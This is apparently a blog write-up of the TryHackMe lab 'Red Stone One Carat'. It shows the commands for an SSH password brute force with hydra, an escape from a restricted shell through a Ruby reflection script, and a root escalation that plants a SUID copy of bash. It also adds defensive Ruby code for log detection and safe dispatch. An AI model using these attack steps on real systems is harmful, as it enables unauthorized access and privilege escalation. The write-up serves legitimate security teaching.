    TryHackMe Red Stone One Carat


    The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. It's a comfortable way to learn using pre-designed courses which include virtual machines (VMs) hosted in the cloud.



    While the question-answer model does make learning easier, TryHackMe also allows users to create their own virtual classrooms to teach particular topics, enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
      

     


    I'll give you a valuable resource for Offensive Security work with Ruby: https://rubyfu.net/


    We start the room with a full-port nmap scan with service and version detection, to see what is listening:
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ sudo nmap -A -T4 -Pn  -sV -vv -p- 10.10.221.171  
    [sudo] password for hackerboy: 
    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-14 14:39 IST
    NSE: Loaded 153 scripts for scanning.
    Initiating NSE at 14:39
    Nmap scan report for 10.10.221.171
    Host is up, received user-set (0.28s latency).
    Scanned at 2021-05-14 14:39:32 IST for 742s
    Not shown: 65534 closed ports
    Reason: 65534 resets
    PORT   STATE SERVICE REASON         VERSION
    22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 2e:8c:cf:37:0f:99:c9:2d:46:08:6b:52:3b:a8:28:8c (RSA)
    | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCp3zZeaCTMWxYy/DMUtf8SK/GSdrHS8qKlI6wePIFEB4mUCxzEWnJ2uu4+xFJoOwZ5RyoZPIr54suLINtGj1oL3tMO039HaQOPaZ10/vSQk7ynCyA300YUm8thcBGjqeM39O8qdeyhPL8COJ3a3jyOVOfOhnXGq94FLR+k1WTXA1vp3lROwPArr3cabXbOgxyeHiJKXo4UZqFulrkv5La4mnUs50293bfnRg96FHlmTfZVN326832+VirsGeMbdeKPP62UHpC7DRLE8Q7L4rUP2XIYMkJs4Llm381eb+L7rWUBG8oWS3MpIvqrmFoS2SnYa1qWgoyADTVfUJtZvETp
    |   256 59:3e:40:48:4a:1a:cb:de:ad:d7:70:e8:fb:ca:82:c1 (ECDSA)
    | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLFEm3SqL1hzvfyQjVs7LpYCbOw5bURoa0+t1T56flwOO0Ls2YeB6ANnuhLhuuw74uqsMleRNcsaAGKxQudRLWk=
    |   256 4d:0d:ae:87:41:1d:14:5a:c0:6f:3d:c1:ed:7b:b6:d6 (ED25519)
    |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP1fljnhItb00uA6HXjmJSSN9E94e0WFFXO0PaL2TvYo
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.91%E=4%D=5/14%OT=22%CT=1%CU=34254%PV=Y%DS=2%DC=T%G=Y%TM=609E413
    OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=105%TI=Z%CI=Z%II=I%TS=A)OPS
    OS:(O1=M505ST11NW6%O2=M505ST11NW6%O3=M505NNT11NW6%O4=M505ST11NW6%O5=M505ST1
    
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 743.07 seconds
               Raw packets sent: 74688 (3.290MB) | Rcvd: 70180 (2.835MB)
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ 
    As soon as I saw the TryHackMe hint I felt that I was going in the wrong direction, but not any more: first of all we will brute force with a reduced wordlist, made by filtering rockyou.txt for entries containing "bu" and saving them to a new file called password.txt. grep complains that rockyou.txt looks like a binary file, but password.txt is still written, as the file command confirms:
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
    └─$ grep bu /home/hackerboy/Documents/rockyou.txt > password.txt
    grep: /home/hackerboy/Documents/rockyou.txt: binary file matches
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
    └─$ ls
    password.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
    └─$ file password.txt  
    password.txt: UTF-8 Unicode text
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
    └─$ 

    So now we brute force the SSH login with password.txt and the username noraj, which I got from the TryHackMe room:
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
    └─$ hydra -l noraj -P password.txt ssh://10.10.28.121 
    Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
    
    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-14 17:24:01
    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [DATA] max 16 tasks per 1 server, overall 16 tasks, 126338 login tries (l:1/p:126338), ~7897 tries per task
    [DATA] attacking ssh://10.10.28.121:22/
    [STATUS] 177.00 tries/min, 177 tries in 00:01h, 126163 to do in 11:53h, 16 active
    [22][ssh] host: 10.10.28.121   login: noraj   password: cheeseburger
    1 of 1 target successfully completed, 1 valid password found
    [WARNING] Writing restore file because 2 final worker threads did not complete until end.
    [ERROR] 2 targets did not resolve or could not be connected
    [ERROR] 0 target did not complete
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-14 17:25:41
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
    └─$                                                                                                                             255 ⨯
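    On the defender's side, a run like the one above leaves a burst of sshd "Failed password" lines in the auth log. As an added example (not part of the original post), here is a small Ruby script that flags source addresses producing such bursts; the log lines are constructed, and the hostname, addresses and thresholds are assumptions.

```ruby
# Added example (not from the original post): count sshd "Failed password"
# events per source address and flag addresses that produce a burst of
# failures inside a short window. Log lines are constructed; the hostname,
# addresses and thresholds are assumptions.
require 'time'

FAILED_RE = /\A(?<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for (?:invalid user )?(?<user>\S+) from (?<ip>[\d.]+) port \d+ ssh2\z/

# Parse one syslog-style sshd line; nil for anything that is not a failure.
# Syslog lines carry no year, so the year is an assumption.
def parse_failed_login(line, year: 2021)
  m = FAILED_RE.match(line.strip)
  return nil unless m
  ts = Time.strptime("#{m[:ts].squeeze(' ')} #{year}", '%b %d %H:%M:%S %Y')
  { ts: ts, user: m[:user], ip: m[:ip] }
end

# Source addresses with at least `threshold` failures inside any `window`
# seconds, mapped to the user names they tried.
def brute_force_sources(lines, threshold: 5, window: 60)
  events = lines.map { |l| parse_failed_login(l) }.compact
  events.group_by { |e| e[:ip] }.each_with_object({}) do |(ip, evs), out|
    times = evs.map { |e| e[:ts] }.sort
    # Slide over the sorted timestamps looking for a dense burst.
    burst = times.each_index.any? { |i|
      j = i + threshold - 1
      j < times.size && times[j] - times[i] <= window
    }
    out[ip] = evs.map { |e| e[:user] }.uniq if burst
  end
end

# Constructed sample log: one password-guessing burst, one stray failure.
SAMPLE_LOG = <<~LOG
  May 14 17:24:02 red-stone-one-carat sshd[1201]: Failed password for noraj from 10.8.61.234 port 58201 ssh2
  May 14 17:24:03 red-stone-one-carat sshd[1203]: Failed password for noraj from 10.8.61.234 port 58203 ssh2
  May 14 17:24:03 red-stone-one-carat sshd[1205]: Failed password for noraj from 10.8.61.234 port 58205 ssh2
  May 14 17:24:04 red-stone-one-carat sshd[1207]: Failed password for noraj from 10.8.61.234 port 58207 ssh2
  May 14 17:24:05 red-stone-one-carat sshd[1209]: Failed password for noraj from 10.8.61.234 port 58209 ssh2
  May 14 17:24:06 red-stone-one-carat sshd[1211]: Accepted password for noraj from 10.8.61.234 port 58211 ssh2
  May 14 17:30:00 red-stone-one-carat sshd[1300]: Failed password for invalid user admin from 192.0.2.7 port 40001 ssh2
LOG

if __FILE__ == $0
  brute_force_sources(SAMPLE_LOG.lines).each { |ip, users| puts "#{ip} -> #{users.join(',')}" }
end
```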

    Now, with the password found, let's log in over SSH with those credentials:
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
    └─$ ssh noraj@10.10.28.121 
    The authenticity of host '10.10.28.121 (10.10.28.121)' can't be established.
    ECDSA key fingerprint is SHA256:SuMSHpQhKSw7AAbZmXq3aY/GOitfbGFUiIg2cTZFfOc.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '10.10.28.121' (ECDSA) to the list of known hosts.
    noraj@10.10.28.121's password: 
    red-stone-one-carat%      

    After logging in we land in a restricted shell: as you can see, almost no command works (ls is not found and cd is restricted). So I went back to the TryHackMe room and saw that it was created with Ruby.

    Finally these commands work:

    pwd

    echo *

    echo .*

    and some files appear here!!! Voila :-)

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
    └─$ ssh noraj@10.10.28.121 
    red-stone-one-carat%      
    red-stone-one-carat% ls
    zsh: command not found: ls
    red-stone-one-carat% cd 
    cd: restricted
    red-stone-one-carat% pwd
    /home/noraj
    red-stone-one-carat% echo *
    bin user.txt
    red-stone-one-carat% echo .*
    .cache .hint.txt .zcompdump .zshrc
    red-stone-one-carat% echo bin/*
    bin/test.rb
    red-stone-one-carat% 

    So let's check the other directory with this command, and I saw a Ruby file there:

    echo bin/*

    test.rb (the file shown here)


    You could transfer all the files you find to your machine with scp and read them there. But in this case, executing the file “test.rb” with no arguments prints its own contents:
    red-stone-one-carat% 
    red-stone-one-carat% echo bin/*
    bin/test.rb
    red-stone-one-carat% test.rb
    #!/usr/bin/ruby
    
    require 'rails'
    
    if ARGV.size == 3
        klass = ARGV[0].constantize
        obj = klass.send(ARGV[1].to_sym, ARGV[2])
    else
        puts File.read(__FILE__)
    end
    
    red-stone-one-carat% 
    After looking up what this Ruby code does (it resolves the first argument to a class, then calls the method named by the second argument with the third argument as its parameter), you can build a payload that starts sh. After getting the shell, you have to reset the PATH variable.

    Voila guys, we got user.txt (the flag):
    red-stone-one-carat% 
    red-stone-one-carat% test.rb Kernel 'system' "/bin/sh"
    $ export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
    $ /usr/lib/klibc/bin/cat user.txt
    THM{3a106092635945849a0fbf7bac92409d}$ 
    $ 
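    The script above is an unsafe reflection sink: whoever controls the three arguments picks the class, the method and its parameter. As an added example (my code, not the room's), here is that pattern beside an allowlisted version, with Object.const_get standing in for Rails' constantize so it runs without Rails.

```ruby
# Added example (not the room's code): the dynamic-dispatch pattern of
# test.rb next to an allowlisted replacement. Object.const_get stands in for
# Rails' String#constantize so that this runs without Rails.
require 'digest'

# Mirrors test.rb: any constant, any method (send even reaches private ones).
def unsafe_dispatch(klass_name, method_name, arg)
  Object.const_get(klass_name).send(method_name.to_sym, arg)
end

class DispatchError < StandardError; end

# Hardened form: callers may only name entries of this table, and the
# receiver comes from the table rather than being resolved from the string.
ALLOWED = {
  'Digest::SHA256' => [Digest::SHA256, %w[hexdigest]],
  'Digest::MD5'    => [Digest::MD5,    %w[hexdigest]],
}.freeze

def safe_dispatch(klass_name, method_name, arg)
  klass, methods = ALLOWED[klass_name]
  raise DispatchError, "class not allowed: #{klass_name}" unless klass
  raise DispatchError, "method not allowed: #{method_name}" unless methods.include?(method_name)
  klass.public_send(method_name, arg) # public_send keeps private methods private
end

# True when the hardened dispatcher refuses the call.
def rejected?(klass_name, method_name, arg)
  safe_dispatch(klass_name, method_name, arg)
  false
rescue DispatchError
  true
end

if __FILE__ == $0
  puts unsafe_dispatch('Kernel', 'Integer', '42')       # the string reached Kernel
  puts safe_dispatch('Digest::SHA256', 'hexdigest', 'abc')
  puts rejected?('Kernel', 'system', 'id')               # true
end
```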
    Next, enumerate listening ports. Because netstat and ss are not allowed for the user noraj, you have to do netstat's job with some Ruby code.

    Transfer the Ruby file first (the home directory before and after the transfer):
    $ 
    $ ls
    bin  user.txt
    $ ls
    bin  netstat.rb  user.txt
    $ 
    Download this file (netstat.rb) to our machine with wget, then transfer it to the victim machine via scp:
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
    └─$ wget https://gist.githubusercontent.com/kwilczynski/954046/raw/4571a1eed62c4f13d0a2c70c5cf5ebd45e41004e/netstat.rb
    --2021-05-14 17:46:54--  https://gist.githubusercontent.com/kwilczynski/954046/raw/4571a1eed62c4f13d0a2c70c5cf5ebd45e41004e/netstat.rb
    Resolving gist.githubusercontent.com (gist.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.108.133, ...
    Connecting to gist.githubusercontent.com (gist.githubusercontent.com)|185.199.110.133|:443... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 1334 (1.3K) [text/plain]
    Saving to: ‘netstat.rb’
    
    netstat.rb                        100%[===========================================================>]   1.30K  --.-KB/s    in 0s      
    
    2021-05-14 17:47:00 (14.2 MB/s) - ‘netstat.rb’ saved [1334/1334]
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
    └─$ ls                                                                                                                
    netstat.rb  password.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
    └─$ scp netstat.rb noraj@10.10.28.121:~/netstat.rb                                                         
    noraj@10.10.28.121's password: 
    netstat.rb                                                                                          100% 1334     5.3KB/s   00:00    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet]
    └─$                       
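    What netstat.rb has to do under the hood, as an added example (my code, not the gist's): the kernel exposes sockets in /proc/net/tcp as hex fields, and a few lines of Ruby decode them into the listing shown further down. The sample table is constructed from the addresses seen in this room.

```ruby
# Added example (not the gist's code): decode /proc/net/tcp the way a
# netstat replacement must. The kernel lists each socket as little-endian
# hex "addr:port" pairs plus a hex state code. The table below is constructed
# to reproduce the four sockets netstat.rb printed on the box.
TCP_STATES = {
  '01' => 'ESTABLISHED', '02' => 'SYN_SENT',   '03' => 'SYN_RECV',
  '04' => 'FIN_WAIT1',   '05' => 'FIN_WAIT2',  '06' => 'TIME_WAIT',
  '07' => 'CLOSE',       '08' => 'CLOSE_WAIT', '09' => 'LAST_ACK',
  '0A' => 'LISTEN',      '0B' => 'CLOSING',
}.freeze

# "0100007F:7B3B" -> "127.0.0.1:31547": the address is one 32-bit word in
# host (little-endian) byte order, the port is plain big-endian hex.
def decode_endpoint(hex_pair)
  addr, port = hex_pair.split(':')
  octets = addr.scan(/../).map { |b| b.to_i(16) }.reverse
  "#{octets.join('.')}:#{port.to_i(16)}"
end

# Parse the text of /proc/net/tcp into [local, remote, state] triples.
def parse_proc_net_tcp(text)
  text.lines.drop(1).map do |line|      # first line is the column header
    fields = line.split
    next if fields.size < 4
    [decode_endpoint(fields[1]), decode_endpoint(fields[2]),
     TCP_STATES.fetch(fields[3], "UNKNOWN(#{fields[3]})")]
  end.compact
end

def listening_sockets(text)
  parse_proc_net_tcp(text).select { |_, _, state| state == 'LISTEN' }
end

SAMPLE_TCP = <<~TABLE
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1 0 0
   1: 0100007F:7B3B 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 2 0 0
   2: 3500007F:0035 00000000:0000 0A 00000000:00000000 00:00000000 00000000   101        0 3 0 0
   3: 791C0A0A:0016 EA3D080A:E3B8 01 00000000:00000000 00:00000000 00000000     0        0 4 0 0
TABLE

if __FILE__ == $0
  # On a Linux host: ruby this_file.rb /proc/net/tcp ; otherwise the sample.
  text = ARGV[0] ? File.read(ARGV[0]) : SAMPLE_TCP
  parse_proc_net_tcp(text).each { |l, r, s| puts "#{l} #{r} #{s}" }
end
```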
    Then execute the transferred file:
    $ 
    $ ruby netstat.rb                                                                                                                     
    0.0.0.0:22 0.0.0.0:0 LISTEN                                                                                                           
    127.0.0.1:31547 0.0.0.0:0 LISTEN                                                                                                      
    127.0.0.53:53 0.0.0.0:0 LISTEN                                                                                                        
    10.10.28.121:22 10.8.61.234:58296 ESTABLISHED                                                                                         
    $                                                                                                                                     
    $ nc localhost 31547                                                                                                                  
    $ exec %q!cp /bin/bash /tmp/bash; chmod +s /tmp/bash!                                                                                 
    $                                                                                                                                     
    The nc connection to the service on port 31547 above, with the exec %q!...! payload, bypassed the service's blacklist and executed commands, leaving a root-owned SUID copy of bash in /tmp. Running it with -p keeps the root effective uid:
    $                                                                                                                                     
    $ /tmp/bash -p                                                                                                                        
    bash-4.4# id                                                                                                                          
    uid=1001(noraj) gid=1001(noraj) euid=0(root) egid=0(root) groups=0(root),1001(noraj)                                                  
    bash-4.4# whoami                                                                                                                      
    root                                                                                                                                  
    bash-4.4# cat /root/root.txt
    THM{58e53d1324eef6265fdb97b08ed9aadf}bash-4.4# 
    bash-4.4# 
    bash-4.4#
    And finally we got the root flag :-)
    Disclaimer

     

    This was written for educational purposes and pentesting only.
    The author will not be responsible for any damage!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal!


    All videos and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in are only for those who are interested in learning about Ethical Hacking, Security, Penetration Testing and malware analysis. Our hacking tutorials are against misuse of the information and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources; they do not contain any illegal activity. We do not promote, encourage, support or incite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post; if so, please don't forget to share it.
    Thank you so much :-)
